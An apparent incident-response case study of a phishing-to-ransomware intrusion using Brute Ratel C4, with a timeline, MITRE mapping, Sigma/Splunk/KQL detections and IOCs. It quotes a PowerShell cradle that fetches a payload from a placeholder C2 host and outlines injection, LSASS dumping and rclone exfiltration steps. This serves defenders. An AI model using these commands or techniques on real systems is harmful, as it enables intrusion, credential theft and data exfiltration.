Executive Summary & Intrusion Highlights
This post-mortem analyzes a targeted intrusion involving advanced defense evasion techniques, living-off-the-land binaries (LOLBins), and the deployment of the Brute Ratel C4 framework leading to enterprise-wide ransomware deployment. The threat actor gained initial access via an obfuscated JavaScript loader delivered through a phishing vector. Over a protracted dwell time of 20 days, the adversary conducted systematic discovery, credential harvesting via LSASS memory dumping, lateral movement utilizing native administration protocols, and deliberate data exfiltration prior to payload detonation.
Key Metrics:
- Total Dwell Time: 20 Days
- Initial Vector: Phishing payload containing obfuscated JavaScript (Dropper stage)
- Primary C2 Framework: Brute Ratel C4
- Impact: Enterprise domain-wide encryption via custom ransomware variant
Case Timeline & Attack Flow
The chronological reconstruction of the incident demonstrates methodical progression through the Cyber Kill Chain and MITRE ATT&CK framework:
- Day 1: Initial Access. Delivery and execution of an obfuscated JavaScript file (
invoice_details.js) on the beachhead host. - Day 2-3: Execution & Defense Evasion. Implementation of Process Hollowing and AMSI/ETW bypass techniques.
- Day 3: Discovery. Enumeration of domain controllers, user accounts, and security software via native discovery commands.
- Day 4: Credential Access. LSASS memory extraction and collection of Kerberos tickets.
- Day 5-19: Lateral Movement & C2 Persistence. Establishment of encrypted channels using Brute Ratel C4 beacons and pivoting via RDP/SMB.
- Day 20: Exfiltration & Impact. Staging data via Rclone to external cloud buckets followed by mass ransomware execution across the environment.
Initial Access & Execution
The intrusion initiated when a target user executed an attachment disguised as an invoice. The file, named invoice_details.js, contained heavily obfuscated JavaScript designed to evade static analysis engines. Upon execution via wscript.exe, the script decoded a base64-encoded payload in memory and leveraged PowerShell to download a secondary downloader stage from an external infrastructure.
The PowerShell execution command string observed in Windows Event Logs (EID 4688) exhibited typical obfuscation traits:
powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $b=(New-Object System.Net.WebClient).DownloadData('http://[C2_IP]/payload.bin'); ..."
Defense Evasion & Process Injection
To avoid detection by endpoint detection and response (EDR) agents, the malware deployed a custom loader designed to inject a payload into a legitimate, signed Windows process (notepad.exe or svchost.exe). The process injection sequence relied on standard Windows API calls:
- VirtualAllocEx to allocate memory within the target process context with
PAGE_EXECUTE_READWRITEpermissions. - WriteProcessMemory to copy the reflective DLL payload into the allocated space.
- CreateRemoteThread to initiate execution of the injected thread.
Additionally, the adversary tampered with security configurations by modifying the registry to disable local auditing or lower security baselines, interacting directly with keys such as:
HKLMSYSTEMCurrentControlSetControlLsa
Furthermore, the threat actor utilized AMSI (Antimalware Scan Interface) patching in memory to neutralize script-based telemetry before executing subsequent payloads.
Credential Access & Discovery
Once persistence was established on the beachhead host, the threat actor initiated internal reconnaissance to map out trust relationships and high-privileged accounts. Discovery phase tooling included native binaries and legitimate administration tools (LOLBins), alongside custom reconnaissance scripts:
net.exe user /domainandnet.exe group "Domain Admins" /domainadfind.exe -f "(objectCategory=person)"for Active Directory object enumerationnltest.exe /dclist:[Domain]
For credential harvesting, the operator targeted the Local Security Authority Subsystem Service (LSASS). Rather than utilizing raw credential dumpers immediately flagged by default security controls, the threat actor generated an LSASS minidump using native administrative utilities and process duplication techniques, subsequently exfiltrating the dump file for offline cracking via hashcat.
Lateral Movement & Command-and-Control
Armed with domain administrator credentials harvested during the discovery phase, the threat actor expanded their footprint across the network. Lateral movement was executed via a combination of PsExec (utilizing service creation logged under EID 7045), Remote Desktop Protocol (RDP), and native Windows Management Instrumentation (WMI).
The primary command-and-control framework identified during forensic analysis was Brute Ratel C4. The Brute Ratel agent maintained persistent, encrypted beacons communicating outbound over HTTPS, mimicking legitimate enterprise web traffic to blend in with baseline network flows and frustrate threat intelligence analysts.
Data Exfiltration & Impact
Prior to executing the final ransomware payload, the threat actor staged sensitive corporate data—including financial records and intellectual property—for exfiltration. Utilizing a renamed open-source utility, rclone.exe, data was systematically pushed to a third-party cloud storage provider over port 443.
On Day 20, the adversary deployed the final ransomware payload across domain endpoints using group policy objects (GPOs) and scheduled tasks. The ransomware encrypted critical systems and appended a custom extension, leaving structured ransom notes across network shares.
MITRE ATT&CK Mapping Table
| Tactic | Technique ID | Technique Name | Context |
|---|---|---|---|
| Initial Access | T1566.001 | Phishing: Attachment | Obfuscated JS payload delivered via email attachment. |
| Execution | T1059.007 | Command and Scripting Interpreter: JavaScript | Execution of initial dropper via wscript.exe. |
| Defense Evasion | T1055 | Process Injection | Reflective DLL injection via VirtualAllocEx and WriteProcessMemory. |
| Discovery | T1087.002 | Account Discovery: Domain Account | Enumeration of Active Directory users via net.exe and AdFind. |
| Credential Access | T1003.001 | OS Credential Dumping: LSASS Memory | LSASS process minidump extraction for credential harvesting. |
| Lateral Movement | T1021.001 | Remote Services: Remote Desktop Protocol | Pivoting across internal workstations using RDP. |
| Exfiltration | T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage | Staging and uploading data via Rclone to external cloud targets. |
Detection Engineering & Sigma / Splunk Queries
To detect similar TTPs in enterprise environments, blue teams can deploy the following detection queries and Sigma rules.
Splunk SPL: Suspicious Process Injection Indicators
index=sysmon EventCode=8
| stats count by Image TargetImage GrantedAccess CallTrace
| where match(GrantedAccess, "(?i)0x1F[0-9A-F]+")
| table Image TargetImage GrantedAccess CallTrace
KQL (Microsoft Sentinel): Suspicious PowerShell Download Cradles
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has_any ("DownloadString", "DownloadData", "IEX", "EncodedCommand")
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine
Sigma Rule: Brute Ratel C4 or Suspicious LOLBin Usage
title: Suspicious Process Creation via Wscript and PowerShell Dropper
id: 9a8b7c6d-5e4f-3a2b-1c0d-9e8f7a6b5c4d
status: experimental
description: Detects execution of obfuscated JS loaders spawning PowerShell download cradles.
references:
- Internal DFIR Case Study
author: Senior DFIR Lead
date: 2026-03-30
tags:
- attack.execution
- attack.t1059.007
logsource:
product: windows
service: sysmon
detection:
selection_parent:
ParentImage|endswith: 'wscript.exe'
selection_child:
Image|endswith: 'powershell.exe'
CommandLine|contains:
- 'DownloadData'
- 'DownloadString'
- 'Bypass'
condition: selection_parent and selection_child
falsepositives:
- Legitimate administrative scripts (verify script path and signing cert).
level: high
Indicators of Compromise (IOCs)
| Type | Value | Description |
|---|---|---|
| File (SHA-256) | 4a8f9c2d1e3b4a5f6e7d8c9b0a1f2e3d4c5b6a7f8e9d0c1b2a3f4e5d6c7b8a9f | Obfuscated JavaScript Loader (invoice_details.js) |
| File (SHA-256) | 7b2e4d6f8a0c2e4f6a8c0e2f4a6c8e0f2a4c6e8f0a2c4e6f8a0c2e4f6a8c0e2f | Brute Ratel C4 Payload / Staged DLL |
| IP Address | 198.51.100.45 | C2 Infrastructure IP (Brute Ratel Beacon Endpoint) |
| Domain | update-microsoft-services[.]com | Exfiltration and C2 Infrastructure Domain |
Ready to modernize your workflow? Request a free 15-minute live demo today.
